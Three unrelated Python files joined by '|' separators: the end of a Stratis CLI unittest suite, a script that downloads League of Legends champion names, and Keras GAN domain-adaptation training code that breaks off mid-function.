        self.unittest_command([STRATIS_CLI, "filesystem", "list"], 0, True, False)
    def test_pool_create(self):
        """
        Test creating a pool.
        """
        pool_name = p_n()
        self.unittest_command(
            [STRATIS_CLI, "pool", "create", pool_name, DISKS[0]], 0, True, True
        )
    def test_pool_list_not_empty(self):
        """
        Test listing an existent pool.
        """
        make_test_pool(DISKS[0:1])
        self.unittest_command([STRATIS_CLI, "pool", "list"], 0, True, False)
    def test_blockdev_list(self):
        """
        Test listing a blockdev.
        """
        self.unittest_command([STRATIS_CLI, "blockdev", "list"], 0, True, False)
    def test_pool_create_same_name(self):
        """
        Test creating a pool that already exists.
        """
        self.unittest_command(
            [STRATIS_CLI, "pool", "create", make_test_pool(DISKS[0:1]), DISKS[1]],
            1,
            False,
            True,
        )
    def test_pool_add_cache(self):
        """
        Test adding cache to a pool.
        """
        # Fix: the second flag was the bare int 1 where every sibling call
        # passes a bool; use True (same truthiness, consistent typing).
        self.unittest_command(
            [STRATIS_CLI, "pool", "add-cache", make_test_pool(DISKS[0:2]), DISKS[2]],
            0,
            True,
            True,
        )
    def test_pool_destroy(self):
        """
        Test destroying a pool.
        """
        self.unittest_command(
            [STRATIS_CLI, "pool", "destroy", make_test_pool(DISKS[0:1])], 0, True, True
        )
    def test_filesystem_create(self):
        """
        Test creating a filesystem.
        """
        filesystem_name = fs_n()
        self.unittest_command(
            [
                STRATIS_CLI,
                "filesystem",
                "create",
                make_test_pool(DISKS[0:1]),
                filesystem_name,
            ],
            0,
            True,
            True,
        )
    def test_pool_add_data(self):
        """
        Test adding data to a pool.
        """
        pool_name = make_test_pool(DISKS[0:1])
        self.unittest_command(
            [STRATIS_CLI, "pool", "add-data", pool_name, DISKS[1]], 0, True, True
        )
    def test_filesystem_list_not_empty(self):
        """
        Test listing an existent filesystem.
        """
        pool_name = make_test_pool(DISKS[0:1])
        make_test_filesystem(pool_name)
        self.unittest_command([STRATIS_CLI, "filesystem", "list"], 0, True, False)
    def test_filesystem_create_same_name(self):
        """
        Test creating a filesystem that already exists.
        """
        pool_name = make_test_pool(DISKS[0:1])
        filesystem_name = make_test_filesystem(pool_name)
        self.unittest_command(
            [STRATIS_CLI, "filesystem", "create", pool_name, filesystem_name],
            1,
            False,
            True,
        )
    def test_filesystem_rename(self):
        """
        Test renaming a filesystem to a new name.
        """
        pool_name = make_test_pool(DISKS[0:1])
        filesystem_name = make_test_filesystem(pool_name)
        fs_name_rename = fs_n()
        self.unittest_command(
            [
                STRATIS_CLI,
                "filesystem",
                "rename",
                pool_name,
                filesystem_name,
                fs_name_rename,
            ],
            0,
            True,
            True,
        )
    def test_filesystem_rename_same_name(self):
        """
        Test renaming a filesystem to the same name.
        """
        pool_name = make_test_pool(DISKS[0:1])
        filesystem_name = make_test_filesystem(pool_name)
        self.unittest_command(
            [
                STRATIS_CLI,
                "filesystem",
                "rename",
                pool_name,
                filesystem_name,
                filesystem_name,
            ],
            1,
            False,
            True,
        )
    def test_filesystem_snapshot(self):
        """
        Test snapshotting a filesystem.
        """
        pool_name = make_test_pool(DISKS[0:1])
        filesystem_name = make_test_filesystem(pool_name)
        snapshot_name = fs_n()
        self.unittest_command(
            [
                STRATIS_CLI,
                "filesystem",
                "snapshot",
                pool_name,
                filesystem_name,
                snapshot_name,
            ],
            0,
            True,
            True,
        )
    def test_filesystem_destroy(self):
        """
        Test destroying a filesystem.
        """
        pool_name = make_test_pool(DISKS[0:1])
        filesystem_name = make_test_filesystem(pool_name)
        self.unittest_command(
            [STRATIS_CLI, "filesystem", "destroy", pool_name, filesystem_name],
            0,
            True,
            True,
        )
if __name__ == "__main__":
    # Parse repeatable --disk arguments into the module-level DISKS list,
    # then hand any remaining CLI arguments on to unittest.
    ARGUMENT_PARSER = argparse.ArgumentParser()
    ARGUMENT_PARSER.add_argument(
        "--disk", action="append", dest="DISKS", help="disks to use", required=True
    )
    PARSED_ARGS, OTHER_ARGS = ARGUMENT_PARSER.parse_known_args()
    DISKS = PARSED_ARGS.DISKS
    print("Using block device(s) for tests: %s" % DISKS)
    # argv[:1] keeps only the program name so unittest never sees --disk.
    unittest.main(argv=sys.argv[:1] + OTHER_ARGS)
|
import requests
import json
def main():
    """Fetch the current LoL champion list and write it to lol_champion_names.txt.

    Asks whether spaces should be stripped from names, reads the current
    patch version from the Data Dragon API, then writes one champion per
    line (comma-separated).
    """
    answer = input('Do you want the words with spaces?(y/n)\n').strip().lower()
    while True:
        if answer == 'n':
            no_spaces = True
            break
        elif answer == 'y':
            no_spaces = False
            break
        else:
            # Bug fix: the re-prompted answer was never normalized, so
            # e.g. 'Y' or ' n ' could never terminate this loop.
            answer = input('Answer with \'y\' or \'n\':\n').strip().lower()
    # get the current patch number for League of Legends
    response = requests.get('https://ddragon.leagueoflegends.com/api/versions.json')
    if not response:
        print('API call for game patch number failed')
        # Bug fix: bail out; previously execution continued and crashed
        # with a NameError on the undefined current_ver below.
        return
    current_ver = json.loads(response.content)[0]
    # get the list of all champions
    response = requests.get('http://ddragon.leagueoflegends.com/cdn/{}/data/en_US/champion.json'.format(current_ver))
    if not response:
        print('API call for champions failed')
        return
    json_res = json.loads(response.content)
    champions = [champ['name'] for champ in json_res['data'].values()]
    formatted = ',\n'.join(champions)
    if no_spaces:
        formatted = formatted.replace(' ', '')
    # Bug fix: use a context manager so the file handle is always closed.
    with open('lol_champion_names.txt', 'w') as f:
        print("Check lol_champion_names.txt")
        f.write(formatted)
if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
import os
import sys
import time
import numpy as np
import models
from keras.utils import generic_utils
import general_utils
from data_utils import *
from image_history_buffer import *
from IPython import display
from models import *
from additional_models import *
from collections import deque
from ImageDataGenerator import *
from time import sleep
class _GAN:
    """Bundle of all models and hyper-parameters for one GAN direction.

    Pure data holder: stores the generator/discriminator/classifier models,
    optimisation settings and bookkeeping objects passed in by the caller.
    `dir` is the mapping direction label (e.g. 'BtoA') used by train_gan.
    """
    def __init__(self, gen, disc, disc_entropy,DCGAN,GenClass,classificator, batch_size, img_source_dim,
        img_dest_dim, noise_dim, noise_scale, lr_D, lr_G, deterministic, inject_noise, model, lsmooth,
        img_buffer, datagen, disc_type, data_aug, n_classes, disc_iters,name, dir ):
        self.generator_model = gen
        self.discriminator_model = disc
        self.discriminator2 = disc_entropy
        self.DCGAN_model = DCGAN
        self.GenClass_model = GenClass
        self.classificator_model = classificator
        self.batch_size = batch_size
        self.img_source_dim = img_source_dim
        self.img_dest_dim = img_dest_dim
        self.bn_mode = 2  # fixed batch-norm mode; not taken from the caller
        self.noise_dim = noise_dim
        self.noise_scale = noise_scale
        self.lr_D = lr_D
        self.lr_G = lr_G
        self.deterministic = deterministic
        self.inject_noise = inject_noise
        self.img_buffer = img_buffer
        self.datagen = datagen
        self.model = model
        self.lsmooth = lsmooth
        self.disc_type = disc_type
        self.dir=dir
        self.disc_iters=disc_iters
        self.data_aug = data_aug
        self.img_dim = img_dest_dim  # alias of img_dest_dim
        self.n_classes = n_classes
        self.name = name
def load_data(img_dim, image_dim_ordering, dset):
    # Load source- and destination-domain datasets for the requested
    # domain-adaptation pair and return them concatenated (train+test),
    # except for the usps pairs which keep the train split only.
    # Returns: X_source, Y_source, X_dest, Y_dest, n_classes,
    #          img_source_dim, img_dest_dim
    # Load and normalize data
    if dset == "mnistM":
        X_source_train, Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(
            img_dim, image_dim_ordering, dset='mnist')
        X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(
            img_dim, image_dim_ordering, dset='mnistM')
    elif dset == "svhn_to_mnist":
        X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn')
        X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist')
    elif dset == "svhn_to_mnist32":
        X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn32')
        X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist32')
    elif dset == "svhn_to_mnist32gray":
        X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn32gray')
        X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist32')
    elif dset == "mnist_to_svhn32gray":
        X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist32')
        X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn32gray')
    elif dset == "mnist_to_svhn32":
        X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist32')
        X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn32')
    elif dset == "mnist_to_usps":
        X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist')
        X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='usps')
    elif dset == "usps_to_mnist":
        X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='usps')
        X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist')
    elif dset == "MnistMtoMnist":
        X_source_train, Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(
            img_dim, image_dim_ordering, dset='mnist')
        X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(
            img_dim, image_dim_ordering, dset='mnistM')
    elif dset == "OfficeAmazonToDslr":
        X_source_train, Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(
            img_dim, image_dim_ordering, dset='OfficeAmazon')
        X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(
            img_dim, image_dim_ordering, dset='OfficeDslr')
    elif dset == "OfficeAmazonToWebcam":
        X_source_train, Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(
            img_dim, image_dim_ordering, dset='OfficeAmazon')
        X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(
            img_dim, image_dim_ordering, dset='OfficeWebcam')
    else:
        # NOTE(review): only prints, then falls through to a NameError on the
        # unset variables below — consider raising ValueError instead.
        print "dataset not supported"
    if n_classes1 != n_classes2:  # sanity check
        # NOTE(review): mismatch is only reported, not treated as an error.
        print "number of classes mismatch between source and dest domains"
    n_classes = n_classes1
    img_source_dim = X_source_train.shape[-3:]  # is it backend agnostic?
    img_dest_dim = X_dest_train.shape[-3:]
    # usps pairs: keep the train split only; all others merge train+test.
    if (dset == "mnist_to_usps") or (dset == "usps_to_mnist"):
        X_source=X_source_train
        Y_source=Y_source_train
        X_dest=X_dest_train
        Y_dest=Y_dest_train
    else:
        X_dest = np.concatenate([X_dest_train, X_dest_test], axis=0)
        Y_dest = np.concatenate([Y_dest_train, Y_dest_test], axis=0)
        X_source = np.concatenate([X_source_train, X_source_test], axis=0)
        Y_source = np.concatenate([Y_source_train, Y_source_test], axis=0)
    return X_source, Y_source, X_dest, Y_dest, n_classes, img_source_dim, img_dest_dim
def load_testset(img_dim, image_dim_ordering, dset):
    # Return only the destination-domain TEST split (data, labels) for the
    # given domain-adaptation pair; used for final-accuracy evaluation.
    # Load and normalize data
    if dset == "mnistM":
        X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(
            img_dim, image_dim_ordering, dset='mnistM')
    elif dset == "svhn_to_mnist32":
        X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist32')
    elif dset == "svhn_to_mnist32gray":
        X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist32')
    elif dset == "mnist_to_svhn32gray":
        X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn32gray')
    elif dset == "mnist_to_svhn32":
        X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn32')
    elif dset == "OfficeAmazonToDslr":
        X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering, dset='OfficeDslr')
    elif dset == "OfficeAmazonToWebcam":
        X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering, dset='OfficeWebcam')
    elif dset == "usps_to_mnist":
        X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering, dset='mnist')
    elif dset == "mnist_to_usps":
        X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering, dset='usps')
    else:
        # NOTE(review): only prints, then falls through to a NameError on the
        # unset variables below — consider raising ValueError instead.
        print "dataset not supported in load_testset function!"
    test_data=X_dest_test
    test_labels=Y_dest_test
    return test_data, test_labels
def build_opt(opt_D, opt_G, lr_D, lr_G, lr_rec=None, opt_rec=None):
    """Instantiate the optimizers for discriminator, generator, classifier
    and z-coherence model; optionally also the reconstructor optimizer.

    Returns a 4-tuple (D, G, C, Z), or a 5-tuple with the reconstructor
    optimizer appended when opt_rec is given.
    """
    optimizers = [
        get_optimizer(opt_D, lr_D),
        get_optimizer(opt_G, lr_G),
        get_optimizer('SGD', 0.01),   # classifier: fixed SGD @ 0.01
        get_optimizer('Adam', lr_G),  # z-coherence: Adam at generator lr
    ]
    if opt_rec is not None:
        optimizers.append(get_optimizer(opt_rec, lr_rec))
    return tuple(optimizers)
def load_compile_reconstructions(generator_model1, generator_model2,noise_dim,img_source_dim1,img_source_dim2,opt_G, opt_rec, classificator_model2=None):
    # Build and compile the two cycle-reconstruction models (G1->G2 and
    # G2->G1) with MSE loss.  When classificator_model2 is given, also build
    # a reconstructor-through-classifier model (cross-entropy loss) with G1
    # frozen and G2/classifier trainable, and return it as a third value.
    rec1 = models.reconstructor(generator_model1, generator_model2, noise_dim, img_source_dim1)
    rec2 = models.reconstructor(generator_model2, generator_model1, noise_dim, img_source_dim2)
    rec1.compile(loss='mse', optimizer=opt_rec)
    rec2.compile(loss='mse', optimizer=opt_rec)
    if classificator_model2 is not None:
        models.make_trainable(generator_model1, False) #because generator_model1 is already trained by a classificator in a supervised setting
        models.make_trainable(generator_model2, True)
        models.make_trainable(classificator_model2, True)
        recClass = models.reconstructorClass(generator_model1, generator_model2, classificator_model2, noise_dim, img_source_dim1)
        recClass.compile(loss='categorical_crossentropy', optimizer=opt_rec)
        return rec1,rec2,recClass
    else:
        return rec1,rec2
def load_compile_models(noise_dim, img_source_dim, img_dest_dim, deterministic, pureGAN, wd, loss1, loss2, disc_type, n_classes, opt_D, opt_G, opt_C, opt_Z,suffix=None,pretrained=False):
    # Build generator, paired discriminators, classifier and the combined
    # DCGAN / generator+classifier models, then compile them with trainable
    # flags toggled so each compiled graph updates only its own weights.
    # Returns a zclass model as the last element only when not deterministic.
    # LOAD MODELS:
    generator_model = models.generator_google_mnistM(
        noise_dim, img_source_dim, img_dest_dim, deterministic, pureGAN, wd,suffix)
    discriminator_model,discriminator2 = models.discriminator_dcgan_doubled(img_dest_dim, wd,n_classes,disc_type)
    # classificator_model = models.classificator_svhn(img_dest_dim, n_classes, wd)
    if pretrained:
        classificator_model = models.resnet50classifier(img_dest_dim, n_classes, wd)
    else:
        classificator_model = models.classificator_google_mnistM(img_dest_dim, n_classes, wd)
    DCGAN_model = models.DCGAN_naive(generator_model, discriminator_model, noise_dim, img_source_dim)
    GenClass_model = models.DCGAN_naive2(generator_model, classificator_model, noise_dim, img_source_dim)
    if not deterministic:
        zclass_model = z_coerence(generator_model, img_source_dim, bn_mode=2, wd=wd,
                                  inject_noise=False, n_classes=n_classes, noise_dim=noise_dim, model_name="zClass")
    # COMPILE MODELS:
    generator_model.compile(loss=loss1, optimizer=opt_G)
    # Freeze discriminators/classifier while compiling the stacked models so
    # the generator's gradient steps do not update them.
    models.make_trainable(discriminator_model, False)
    models.make_trainable(discriminator2, False)
    models.make_trainable(classificator_model, False)
    if disc_type == "simple_disc":
        DCGAN_model.compile(loss=[loss1], optimizer=opt_G)
        models.make_trainable(discriminator_model, True)
        discriminator_model.compile(loss=[loss1], optimizer=opt_D)
    elif disc_type == "nclass_disc":
        DCGAN_model.compile(loss=loss1, optimizer=opt_G)
        GenClass_model.compile(loss=['categorical_crossentropy'], optimizer=opt_G)
        models.make_trainable(discriminator_model, True)
        models.make_trainable(discriminator2, True)
        discriminator_model.compile(loss=loss1, optimizer=opt_D)
        discriminator2.compile(loss=loss2, optimizer=opt_D)
    models.make_trainable(classificator_model, True)
    classificator_model.compile(loss=loss2, metrics=['accuracy'], optimizer=opt_C)
    if not deterministic:
        zclass_model.compile(loss=[loss1], optimizer=opt_Z)
        return generator_model, discriminator_model,discriminator2, classificator_model, DCGAN_model,GenClass_model, zclass_model
    else:
        return generator_model, discriminator_model,discriminator2, classificator_model, DCGAN_model,GenClass_model, None
def load_pretrained_weights(generator_model, discriminator_model,discriminator2, DCGAN_model, name, data, labels, noise_scale, classificator_model=None, resume=False):
    # Optionally restore previously saved weights for all models under the
    # given run `name`.  No-op unless resume=True.  The `data`, `labels` and
    # `noise_scale` arguments feed the (commented-out) evaluation below.
    if resume:  # loading previous saved model weights and checking actual performance
        load_model_weights(generator_model, discriminator_model, DCGAN_model, name, classificator_model, discriminator2=discriminator2)
        #loss4, acc4 = classificator_model.evaluate(data, labels, batch_size=512, verbose=0)
        #print('\n Classifier Accuracy on full target domain: %.2f%%' % (100 * acc4))
def load_buffer_and_augmentation(history_size, batch_size, img_source_dim, n_classes):
    """Build the generated-image history buffer and the augmentation generator.

    Returns:
        (ImageHistoryBuffer, ImageDataGenerator) pair.
    """
    buffer_capacity = int(history_size * batch_size)
    image_history = ImageHistoryBuffer((0,) + img_source_dim,
                                       buffer_capacity, batch_size, n_classes)
    # Light geometric augmentation: small rotation plus 10% shifts.
    augmenter = ImageDataGenerator(rotation_range=0.45,
                                   width_shift_range=0.1,
                                   height_shift_range=0.1,
                                   fill_mode='nearest')
    return image_history, augmenter
def get_loss_list():
    """Create the rolling loss windows used for progress reporting.

    Each window is a fixed-length deque of 10 zeros; new losses are pushed
    with appendleft so a mean over the window smooths the progbar display.
    """
    def _window():
        # Fresh 10-slot window, pre-filled with zeros.
        return deque(10 * [0], 10)

    list_disc_loss_real = _window()
    list_disc_loss_gen = _window()
    list_gen_loss = _window()
    list_zclass_loss = _window()
    list_classifier_loss = _window()
    list_GenClass_loss = _window()
    l_rec = _window()
    l_recClass = _window()
    return list_disc_loss_real, list_disc_loss_gen, list_gen_loss, list_zclass_loss, list_classifier_loss, l_rec, list_GenClass_loss, l_recClass
def get_batch(A_data, A_labels, B_data, B_labels, batch_size):
    """Draw one mini-batch from each of the two domains (A and B)."""
    batch_a = next(gen_batch(A_data, A_labels, batch_size))
    batch_b = next(gen_batch(B_data, B_labels, batch_size))
    # gen_batch also yields the sample indices; callers here do not need them.
    return batch_a[0], batch_a[1], batch_b[0], batch_b[1]
def train_gan(GAN, disc_iters, A_data, A_labels, B_data, B_labels, batch_counter, l_disc_real, l_disc_gen, l_gen,l_GenClass,class_weight):
    """Run `disc_iters` discriminator updates, then one generator update.

    The two branches mirror each other: for 'BtoA' the source domain is B and
    the destination is A; for 'AtoB' it is the reverse.  Losses are pushed
    onto the rolling deques supplied by the caller.  Returns the last batches
    drawn so the caller can reuse them for classifier/reconstruction steps.
    """
    if GAN.dir == 'BtoA':
        for disc_it in range(disc_iters):
            A_data_batch, A_labels_batch, B_data_batch, B_labels_batch = get_batch(A_data, A_labels, B_data, B_labels, GAN.batch_size)
            X_source_batch = B_data_batch
            #Y_source_batch = B_labels_batch
            X_dest_batch = A_data_batch
            Y_dest_batch = A_labels_batch
            ##########
            # Create a batch to feed the discriminator model
            #########
            X_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
            gen_output = GAN.generator_model.predict([X_noise,X_source_batch])
            #X_disc_real, X_disc_gen = get_disc_batch(X_dest_batch, GAN.generator_model, batch_counter, GAN.batch_size,
            #                                         GAN.noise_dim, X_source_batch, noise_scale=GAN.noise_scale)
            # Real samples get label 1, generated samples label 0.  Both disc
            # types currently use the same labels (no label smoothing).
            if GAN.disc_type == "simple_disc":
                current_labels_real = np.ones(GAN.batch_size)
                current_labels_gen = np.zeros(GAN.batch_size)
            if GAN.disc_type == ("nclass_disc"):
                current_labels_real = np.ones(GAN.batch_size)
                current_labels_gen = np.zeros(GAN.batch_size)
            ##############
            # Train the disc on gen-buffered samples and on current real samples
            ##############
            disc_loss_real = GAN.discriminator_model.train_on_batch(X_dest_batch, current_labels_real)
            # Generated samples pass through a history buffer so the
            # discriminator also revisits older generator outputs.
            GAN.img_buffer.add_to_buffer(gen_output, current_labels_gen, GAN.batch_size)
            bufferImages, bufferLabels = GAN.img_buffer.get_from_buffer(GAN.batch_size)
            disc_loss_gen = GAN.discriminator_model.train_on_batch(bufferImages, bufferLabels)
            # NOTE(review): disc2_loss is computed but never recorded anywhere.
            disc2_loss = GAN.discriminator2.train_on_batch(X_dest_batch,Y_dest_batch * 1.0) #GAN.lsmooth) #training the discriminator_classifier model
            l_disc_real.appendleft(disc_loss_real)
            l_disc_gen.appendleft(disc_loss_gen)
        #Train the GENERATOR, it is the same on both AtoB and BtoA:
        X_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
        if GAN.disc_type == "simple_disc":
            gen_loss = GAN.DCGAN_model.train_on_batch([X_noise,X_source_batch], np.ones(GAN.batch_size))
        elif GAN.disc_type == "nclass_disc":
            gen_loss = GAN.DCGAN_model.train_on_batch([X_noise,X_source_batch], np.ones(GAN.batch_size))
            # Auto-labelling: the model's own most confident prediction is
            # turned into a one-hot target for the generator+classifier model.
            class_p = GAN.GenClass_model.predict([X_noise,X_source_batch]) #AUTOLABELLING
            idx = np.argmax(class_p, axis=1)
            # NOTE(review): `* 1.0` binds to np.arange, so virtual_labels is a
            # boolean array rather than floats -- confirm this is intended.
            virtual_labels = (idx[:, None]) == np.arange(GAN.n_classes) * 1.0
            GenClass_loss = GAN.GenClass_model.train_on_batch([X_noise,X_source_batch], virtual_labels)
            l_GenClass.appendleft(GenClass_loss)
        l_gen.appendleft(gen_loss)
    elif GAN.dir == 'AtoB':
        for disc_it in range(disc_iters):
            A_data_batch, A_labels_batch, B_data_batch, B_labels_batch = get_batch(A_data, A_labels, B_data, B_labels, GAN.batch_size)
            X_source_batch = A_data_batch
            Y_source_batch = A_labels_batch
            X_dest_batch = B_data_batch
            #Y_dest_batch = B_labels_batch
            X_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
            gen_output = GAN.generator_model.predict([X_noise,X_source_batch])
            #X_disc_real, X_disc_gen = get_disc_batch(X_dest_batch, GAN.generator_model, batch_counter, GAN.batch_size,
            #                                         GAN.noise_dim, X_source_batch, noise_scale=GAN.noise_scale)
            if GAN.disc_type == "simple_disc":
                current_labels_real = np.ones(GAN.batch_size)
                current_labels_gen = np.zeros(GAN.batch_size)
            if GAN.disc_type == ("nclass_disc"):
                current_labels_real = np.ones(GAN.batch_size)
                current_labels_gen = np.zeros(GAN.batch_size)
            ##############
            #Train the disc on gen-buffered samples and on current real samples
            ##############
            disc_loss_real = GAN.discriminator_model.train_on_batch(X_dest_batch, current_labels_real)
            GAN.img_buffer.add_to_buffer(gen_output,current_labels_gen, GAN.batch_size)
            bufferImages, bufferLabels = GAN.img_buffer.get_from_buffer(GAN.batch_size)
            disc_loss_gen = GAN.discriminator_model.train_on_batch(bufferImages, bufferLabels)
            # Here the classifier-discriminator is trained on generated images
            # with the known source labels (AtoB keeps A's labels).
            disc2_loss = GAN.discriminator2.train_on_batch(gen_output,Y_source_batch * 1.0) #GAN.lsmooth) #training the discriminator_classifier model
            l_disc_real.appendleft(disc_loss_real)
            l_disc_gen.appendleft(disc_loss_gen)
        #Train the GENERATOR, it is the same on both AtoB and BtoA:
        X_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
        if GAN.disc_type == "simple_disc":
            gen_loss = GAN.DCGAN_model.train_on_batch([X_noise,X_source_batch], np.ones(GAN.batch_size)) #TRYING SAME BATCH OF DISC
        elif GAN.disc_type == "nclass_disc":
            gen_loss = GAN.DCGAN_model.train_on_batch([X_noise,X_source_batch], np.ones(GAN.batch_size)) #TRYING SAME BATCH OF DISC
            # Known A-domain labels are used here, scaled by class_weight.
            GenClass_loss = GAN.GenClass_model.train_on_batch([X_noise,X_source_batch], Y_source_batch,sample_weight=np.ones(GAN.batch_size)*class_weight)
        #gen_loss = gen_loss[0]
        l_gen.appendleft(gen_loss)
        l_GenClass.appendleft(GenClass_loss)
    return A_data_batch, A_labels_batch, B_data_batch, B_labels_batch
def train_class(GAN, l_class, A_data_batch, A_labels_batch):
    """Train the classifier for one step on (mapped) A-domain samples.

    For an 'AtoB' GAN the A batch is first mapped into the B domain by the
    generator; for 'BtoA' the classifier is trained on the raw A batch.
    The step loss is pushed onto `l_class`, which is returned.
    """
    if GAN.dir == 'AtoB':
        X_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
        if GAN.data_aug:
            # BUGFIX: `datagen` was an unbound name here (NameError when
            # data_aug is enabled); the augmenter lives on the GAN object.
            # NOTE(review): `.output(...)` is assumed to apply the
            # augmentation to the batch -- confirm against the
            # ImageDataGenerator implementation in use.
            x_dest_batch = GAN.generator_model.predict([X_noise, GAN.datagen.output(A_data_batch)])
        else:
            x_dest_batch = GAN.generator_model.predict([X_noise, A_data_batch])
        # NO LABEL SMOOTHING!!!! inverted training w.r.t. to AtoB, because I
        # have labels of A
        class_loss = GAN.classificator_model.train_on_batch(x_dest_batch, A_labels_batch)
    elif GAN.dir == 'BtoA':
        class_loss = GAN.classificator_model.train_on_batch(A_data_batch, A_labels_batch)
    # train_on_batch returns [loss, accuracy] (the classifier is compiled
    # with metrics=['accuracy']); keep only the loss for the rolling window.
    l_class.appendleft(class_loss[0])
    return l_class
def train_rec(GAN,rec1, rec2, A_data_batch, B_data_batch, l_rec1, l_rec2,rec_weight):
    """One reconstruction (cycle-consistency) step for both generator chains.

    Each reconstruction model takes two independent noise draws plus a batch
    from its own domain and is trained to reproduce that batch, weighted by
    `rec_weight`.  Both losses are pushed onto their rolling windows.
    """
    noise_a = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
    noise_b = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
    step_weights = np.ones(GAN.batch_size) * rec_weight
    loss_a = rec1.train_on_batch([noise_a, A_data_batch, noise_b], A_data_batch, sample_weight=step_weights)
    loss_b = rec2.train_on_batch([noise_a, B_data_batch, noise_b], B_data_batch, sample_weight=step_weights)
    l_rec1.appendleft(loss_a)
    l_rec2.appendleft(loss_b)
    return l_rec1, l_rec2
def train_recClass(GAN,recClass, A_data_batch, A_labels_batch, l_recClass, rec_weight):
    """One reconstruction-classification step on labelled A-domain samples."""
    first_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
    second_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
    # Train the cycled classifier to recover the known A labels, scaled by
    # the reconstruction weight.
    step_loss = recClass.train_on_batch(
        [first_noise, A_data_batch, second_noise],
        A_labels_batch,
        sample_weight=np.ones(GAN.batch_size) * rec_weight)
    l_recClass.appendleft(step_loss)
    return l_recClass
def train_gen_zclass(generator_model, DCGAN_model, zclass_model, disc_type, deterministic, noise_dim, noise_scale, batch_size, l_gen, l_zclass, X_source, Y_source, n_classes):
    """Train the generator (and, when stochastic, the z-coherence model).

    One generator step against the discriminator stack, then -- unless
    `deterministic` -- one z-class step that trains the model to recover the
    injected noise.  Losses are pushed onto `l_gen` / `l_zclass`.
    """
    X_gen = sample_noise(noise_scale, batch_size, noise_dim)
    X_source_batch2, Y_source_batch2, idx_source_batch2 = next(
        gen_batch(X_source, Y_source, batch_size))
    if disc_type == "simple_disc":
        gen_loss = DCGAN_model.train_on_batch([X_gen, X_source_batch2], np.ones(X_gen.shape[0]))
    elif disc_type == ("nclass_disc"):
        # BUGFIX: this branch referenced an unbound name `GAN`
        # (GAN.batch_size / GAN.n_classes); the sizes are available directly
        # as function arguments.
        virtual_labels = np.zeros([batch_size, n_classes])
        gen_loss = DCGAN_model.train_on_batch([X_gen, X_source_batch2], [np.ones(X_gen.shape[0]), virtual_labels])
    l_gen.appendleft(gen_loss)
    if not deterministic:
        # Train the z-coherence model to reconstruct the noise vector.
        zclass_loss = zclass_model.train_on_batch(
            [X_gen, X_source_batch2], [X_gen])
    else:
        zclass_loss = 0.0
    l_zclass.appendleft(zclass_loss)
    return l_gen, l_zclass
def visualize_save_stuffs(GANs, progbar, gen_iterations, batch_counter, n_batch_per_epoch, l_disc_real1, l_disc_gen1, l_gen_loss1,
                          l_class_loss1, l_disc_real2, l_disc_gen2, l_gen_loss2,l_class_loss2, A_data, A_labels, B_data, B_labels,
